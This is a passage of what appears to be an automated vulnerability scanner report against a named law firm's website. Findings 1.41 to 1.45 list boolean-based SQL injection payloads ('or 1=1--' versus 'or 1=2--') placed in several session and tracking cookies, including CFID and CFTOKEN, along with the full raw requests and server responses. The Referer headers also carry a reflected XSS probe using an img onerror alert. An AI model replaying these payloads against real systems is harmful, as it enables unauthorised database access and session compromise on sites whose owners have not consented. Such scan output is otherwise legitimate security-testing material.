<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 11156126'%20or%201%3d1--%20 and 11156126'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Thu, 13-May-2010 00:35:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 19712225'%20or%201%3d1--%20 and 19712225'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Thu, 13-May-2010 00:35:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 69636218%20or%201%3d1--%20 and 69636218%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 17:52:49 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822681;path=/
Set-Cookie: CFTOKEN=69086628;path=/
Date: Thu, 12 May 2011 17:52:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14408940%20or%201%3d1--%20 and 14408940%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 17:52:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822701;path=/
Set-Cookie: CFTOKEN=52571639;path=/
Date: Thu, 12 May 2011 17:52:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 43088770'%20or%201%3d1--%20 and 43088770'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 17:53:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
